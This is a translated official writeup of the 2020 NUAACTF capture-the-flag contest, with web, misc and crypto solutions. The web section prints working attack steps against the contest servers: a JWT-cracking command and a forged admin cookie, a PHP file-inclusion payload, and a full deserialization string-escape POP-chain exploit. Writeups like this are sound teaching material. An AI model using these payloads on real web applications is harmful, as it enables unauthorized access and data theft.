Preface

I'm a lazy dog; I couldn't be bothered to reproduce the remaining challenges, so I'm just posting the official writeup directly.
2020 NUAACTF official writeup

Web

checkin

Challenge: just check in and you're done http://139.9.221.0:8086

Solution:
This challenge tests the curl command: curl the URL and the flag is returned directly.


jwt

Challenge: swapping a cat for the crown prince? *sob sob* To get the flag, you need to become admin http://139.9.221.0:8090/

Solution:
Tests JWT.
Opening the page shows a bare-bones login form.
First, brute-force the JWT to recover the secret.
Then rebuild the JWT and substitute it for the original one.

    git clone https://github.com/brendan-rius/c-jwt-cracker
    cd c-jwt-cracker
    ls
    make
    ./jwtcrack eyJhbGcioiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ilx1MWQyY1x1MMQzMFX1MWMQz0Vx1MWQzNVx1MWQzYSJ9.f_4pXKIaMsBdYkh1aNBowAT_qIGRsjQtzcvvkcycokE

Register and log in, then find the cookie it sets.


Online tool

Enter the recovered secret and the JWT, then change the username to admin.

Finally, replace the cookie:

    document.cookie="JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.SYQ-AGwY5XIcxY621ToK8zEgomHE0Bla9tAUWTLxnwA"

Refresh the page and you get the flag.

easypop

Challenge: http://139.9.221.0:8088/

Solution:
Code audit.

Run the PHP code to produce the payload.

There is a parameter d that accepts input, so append ?d=payload to get the final flag.

command

Challenge: http://139.9.221.0:8092/

Solution:
File inclusion: read file contents through a PHP stream wrapper (php:// pseudo-protocol). "flag" is filtered and so is "data", so the flag can't be read directly; the hint points to createfun.php, so fetch its source the same way, then use readfile to read flag.php.

The URL shows ?file=index

File read; after decoding:

    <?php
    error_reporting(0);
    @$file = $_GET["file"];
    if(isset($file)) {
        if(preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
            echo "<p> error! </p>";
        }
        else {
            include($file.'.php');
            setcookie("tips","createfun.php");
        }
    }
    else {
        header('Location:include.php?file=index');
    }
    ?>

It hints at createfun.php; read that one the same way:

    <?php
    $func = @$_GET['func'];
    $arg = @$_GET['arg'];
    if(isset($func)&&isset($arg)) {
        $func($arg,'');
    }
    readfile("flag.php","");

payload: createfun.php?func=show_source&arg=flag.php
This gives the flag.

web5 (original challenge from the Anheng April competition)

Challenge: http://139.9.221.0:8094/

Solution:
POP chain + deserialization string-length escape.

    <?php
    // Same filter as the target: every "flag" is deleted after serialization,
    // so the s:N: length prefixes no longer match the data that follows them.
    function filter_nohack($data) {
        return str_replace('flag', '', $data);
    }
    class C{
        public $c = "flflagag.php";
    }
    class B{
        public $b;
        function __construct(){
            $this->b = new C();
        }
    }
    // O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}
    class A{
        // 6 x "flag" = 24 characters that the filter removes; the s:24 prefix then
        // swallows the 24 characters following the emptied username, so parsing resumes
        // inside $password and the injected B object becomes the password property.
        public $username = 'flagflagflagflagflagflag';
        public $password = '1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}';
    }
    // echo serialize(new B());
    echo filter_nohack(serialize(new A()));
    ?>

Misc

Fake Smile Boy

Challenge: when you see his fake smile, you see the flag.
Plus an attachment (extraction code: ivqg)

Solution:
Open the attached image; it is obvious that the image height has been altered, so change the height in WinHex (7C -> CE) and the flag appears.
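An added example, not part of the writeup, assuming the attachment is a PNG (the page does not name the format): it reads the height from the IHDR chunk and rewrites it, recomputing the chunk CRC that a raw hex edit such as the 7C -> CE change leaves stale. The sample PNG header is constructed; only the signature and IHDR are needed to exercise the logic.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_dimensions(data: bytes):
    """Return (width, height) from the IHDR chunk; raise if this is not a PNG."""
    if data[:8] != PNG_SIG or data[12:16] != b"IHDR":
        raise ValueError("not a PNG")
    return struct.unpack(">II", data[16:24])


def ihdr_crc_ok(data: bytes) -> bool:
    """True if the stored IHDR CRC matches the chunk type + body (bytes 12..28)."""
    stored = struct.unpack(">I", data[29:33])[0]
    return stored == (zlib.crc32(data[12:29]) & 0xFFFFFFFF)


def set_png_height(data: bytes, height: int) -> bytes:
    """Rewrite the IHDR height and recompute the CRC. A hex editor changes only the
    height bytes, so viewers that verify CRCs would flag the edited file."""
    png_dimensions(data)  # validates the header
    body = data[16:20] + struct.pack(">I", height) + data[24:29]
    crc = struct.pack(">I", zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF)
    return data[:16] + body + crc + data[33:]


def make_ihdr_only_png(width: int, height: int) -> bytes:
    """Constructed sample: signature + IHDR chunk (8-bit RGB, no interlace)."""
    body = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    crc = struct.pack(">I", zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF)
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + body + crc
```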

wireshark

Challenge: have you heard of traffic analysis?
Plus an attachment (extraction code: g99i)

Solution:
Filter for http.
Right-click the first packet and follow the HTTP stream.

babyhttp

Challenge: do you know what HTTP is? (You can't open the site the usual way.) Hint: The newest. 106.14.153.173 8443

Solution:

babysdn

Challenge: networking has a hot research area called SDN; so, do you know what SDN can do?
Plus an attachment (extraction code: 4tqs)

Solution:

Crypto

Base

Challenge: ZmxhZ3t0aGlzX2lzX3JlYWlseV9jaGVjazFufQ==

Solution:
Base64-decode it and you get the flag directly.

BruTE_RSA

题目:RSA!!!!RSA!!!!BRUTE TO GET ANSWET!!!!!!!!!!!
Plus an attachment (extraction code: s2wj)

Solution:
Just run the script.

Script:

    from Crypto.Util.number import *
    e,n=(65537, 28150970547901913019901824364390497053600856369839321617996700606130553862041378369018779003752433356889118526332329074054728613209407037089320809898343953157935211086135010436283805891893636870991411236307901650696221491790470635225076251966300189483160148297407974155121570252648252906976186499329924342873)
    enc = [14765505659704388743616301253113404978973036615434543467291787063794853415443968447959471191502871327842007582193254954935225085964793898246044520718579206673198788548223402073410975385387693589482235535922205342040654898190651699673461841349817879859547738827158993445539388974095437440553515593043557648807, 2710029303357232932696197225263692040597986927359269224740812600224998707144266259851604978553286889767425982708691908438984279442981540971935737617354609856642312100797081348174935195638083002333058089328102430432526612805955273581245352312630845237670744276402867230550537275379675828467791243032108754996, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 15645290594995180815865397749136800126080704684884296404807344870555186823350216705796063922278419585484662234210001661578549560411864952462380096494781766394542247609648743673312823946783517115542404474786395934886667795692210287283039316418126796934535150832709500306153601987121172178183970841498331059732, 21617442555922665335003358556294294909187675782115332690799733331050423993084437815407074404916831963972996250287968498545085187385399453596033041024572405343861256748315571881946459758027781418048747455833279362845979940372523947345690345032301120487629036754902398646347412656580163307412681787740326750664, 
19348488683349923919342516509447021301746908048804474589065296857691964147685313468743094214731368033049009363513595472264453418344479015479950114621314151879917864993370204552541811013392195313132212094385213307392785310155965672154730876755558332642480036174252524027472919787968385243506253357608920063714, 20629854768856798537062426042570334097651328955665698429979954410631113160492201197690192324881508105172595216229624523572595589920695165876501026993810936392510720968159305964832449680889041278532807173859579419197780294984519222830572413180237776797800176462492384318120546495539728732366110782215071262307, 4495435878782180842982598979426848915852309873951905660784792756061068459745710732551595437224048091881417293289266990062187024491087558766616793894302825089791068743147292750307839875294040412901324620528855104301423793144510274139088687721663452221761938305437162345452537045550568167370305116690051809783, 7661724340183101803591438713865416768017391036182721504091980175077745408041746171218955895291610457305692166626410041038406057265635459620914206831469173220106400383322269228580211741720875953586267934600483199784699180072179352772979897002989476042210549203971233854410479608166774751479330366431269265143, 24345863558959407738249127568820138362115734211146549194534219311913032290216606859385934708675962835857804566049600710875035366973110422262131331932310524891713319358676673958738776644229757625523955354996402750265022578843637525183704187498194489645838490640529841182709661371499013082259193633000753627261, 11113777356910731413424023299582648618258376222028450254478672148119889617557563576704932635131420845868165014982665717620845578039880527701593963719893467068820107811384041511295664833904504511210342105242330522375476482706044695838957591685781703894244561607764476555630573446589408768780659378128082633769, 
20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 278354276293884030290100330445865286604723740111170856624965259573282278044823323212960304154629174664076141280100412502135750130875356944835909175355370317285768658282746817782130476757714384697086179400629156643250500432197002583758692394681401772203578628635926749457621478296182304772136118691761841359, 26776010333646450951505049676798517095081501649769062476875716987657158152377399163942730185158271646633743195869088200844528079059295287584662315673931850954417499218402302988583172752092835706460505394013520642399572786659316981175560215257281870309157885279753459530446588724712091187670587598328257057843, 6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 
11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 5097867843777034076271397095201528351784693372027998615436445410912131141882225577577253530396333413579756394884096318434100382509189974240357351425474190558456256750742731090012822064840481143528081027106843123030275420215136304130321013605031261372665636366377162666476737296028608455229357416005773064242, 6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 
6299797715315883788568386920153946350102184029350495209512618821428500521839407821906928005187309243941446249274962920569784287027218357127017163201212917410884120132324167402443661321018326446492786599536322735596548965777531626163278557739549793540563082341626824289439450641992070425122260023203460024220, 23267174349531278768420819619439317179083929128083924515569762521057285892931325108327037262091624670335579302436476096123152288550738706103166820604983405317430467198343871458522070337902643863890959573514405066297449924638838605501211486861582957963752388608487593217237563529201436917108304692859773404548]
    flag = ''
    for i in enc:
        # Textbook RSA without padding is deterministic, so each single-character
        # ciphertext can be matched by re-encrypting every possible byte value.
        for j in range(256):
            if pow(bytes_to_long(bytes([j])), e, n) == i:
                flag += chr(j)
                break
    print(flag)

FFRREEQQ_RSA

Challenge: I hear people who talk a lot can't keep secrets? Note: the answer to this challenge will not directly take the form flag{i_am_flag}, but you will see something like FLAG IS I AM FLAG; just submit flag{I_AM_FLAG}.
Plus an attachment (extraction code: 0z7a)

Solution:
Open output.txt: the encrypted content is very long, which means frequency analysis can be used to guess what each encrypted character is.
One thing to note: since nothing restricts the plaintext to English letters, the most frequent character is actually the space. Use a script to replace the ciphertext values with simpler symbols (textbook RSA guarantees that each ASCII character encrypts to a distinct ciphertext), and then the ciphertext can be analysed by character frequency.
Click me

DONBT STARVE IS A MARVELOUS SURVIVAL GAMEZTHE GAME OPENS WITH MAXWELL SNIDELY COMMENTING ON THE PLAYERBS GAUNT APPEARANCE AND INCLUDES LITTLE FURTHER STORYZTHE GAMEBS SETUP IS TOLD FURTHER THROUGH ITS TRAILERJ ON A DARK AND STORMY NIGHT[ WILSON APPEARS TO E GETTING NOWHERE IN A CHEMISTRY EXPERIMENT UNTIL HE IS STARTLED Y HIS RADIO SPEAKING TO HIMZ IT REVEALS THAT IT HAS NOTICED HIS TROULE AND HAS SECRET KNOWLEDGE OF HIMZ WHEN HE EAGERLY AGREES[ A FLURRY OF E]UATIONS AND DIAGRAMS ENCIRCLE HIM AND FILL HIS HEADZ USING WHITE RATS[ A TYPEWRITER[ AND HIS LOOD AMONG OTHER TOOLS AND MATERIALS[ WILSON CREATES A GIANT MACHINEZ THE RADIO COMMENDS HIS WORK AND TELLS HIM TO PULL THE MACHINEBS SWITCHZ HE HESITATES[ UT AT THE RADIOBS INSISTENCE[ HE DOES SOZ THE MACHINE RATTLES VIOLENTLY[ AND A PAIR OF GHOSTLY ARMS WHISK HIM INTO A DIFFERENT WORLD WHILE AN APPARITION OF MAXWELL CACKLESZTHE FLAG IS THIS IS ALSO FAKE RSA

At the end you see FLAG IS THIS IS ALSO FAKE RSA
Flag: flag{THIS_IS_ALSO_FAKE_RSA}
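An added example, not the script the writeup links to: it reproduces the approach on a constructed toy key and sample text, replacing each distinct ciphertext value with a placeholder so the text reads like a monoalphabetic substitution, with the most frequent value taken as the space, and then applying analyst corrections. N, E, SAMPLE and the helper names are assumptions.

```python
from collections import Counter

# Constructed toy RSA public key (p=61, q=53, so n=3233). Only its size differs from the
# challenge: with textbook RSA and no padding, a given character always encrypts to
# the same value, which is what makes frequency analysis possible.
N, E = 3233, 17
# Constructed sample plaintext standing in for the challenge's output.txt.
SAMPLE = "THE FLAG IS NOT HERE BUT THE SPACE IS THE MOST FREQUENT SYMBOL IN THE TEXT"
ENGLISH_ORDER = "ETAOINSHRDLCUMWFGYPBVKJXQZ"  # letters by typical English frequency


def encrypt_chars(text, e=E, n=N):
    """Encrypt each character on its own, the way the challenge did."""
    return [pow(ord(ch), e, n) for ch in text]


def frequency_rank(cts):
    """Distinct ciphertext values, most frequent first."""
    return [ct for ct, _ in Counter(cts).most_common()]


def symbolize(cts):
    """Rewrite the ciphertext as a substitution text: the most frequent value becomes a
    space (the writeup's observation), the rest get an English-frequency first guess,
    so word boundaries and repeated patterns become readable. Returns (text, mapping)."""
    rank = frequency_rank(cts)
    mapping = {rank[0]: " "}
    for ct, guess in zip(rank[1:], ENGLISH_ORDER):
        mapping[ct] = guess
    for ct in rank[1 + len(ENGLISH_ORDER):]:
        mapping[ct] = "?"  # more distinct values than guesses: leave unknown
    return "".join(mapping[ct] for ct in cts), mapping


def refine(cts, mapping, corrections):
    """Apply analyst corrections {placeholder: real letter} worked out from word
    patterns (e.g. the recurring three-letter word is probably THE)."""
    fixed = {ct: corrections.get(sym, sym) for ct, sym in mapping.items()}
    return "".join(fixed[ct] for ct in cts)
```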

RREAL_RSA

Challenge: I AM RSA
Plus an attachment (extraction code: ifs4)

Solution:
Factor n into p and q with yafu, then run the script.

Script:

    from Crypto.Util.number import *
    from gmpy2 import *
    n = 1106081963347301781444155926534938643298217639670251381867474826890728970307
    p = 167622749606696848477732277529837832463   # factors of n, found with yafu
    q = 6598638704725743849027686163703739789
    e = 65537
    c = 681873475888907291485502809441689140305197371659486141705279050132490452420
    assert p * q == n
    d = invert(e, (p - 1) * (q - 1))   # private exponent
    m = pow(c, d, n)
    print(long_to_bytes(m))

Certificate Authority

Challenge: conic section? hyperbola? or elliptic curve? But first you need to dig some clues out of the certificate.
Plus an attachment (extraction code: siud)

Solution:
Tests the encryption scheme: the Menezes-Vanstone cryptosystem.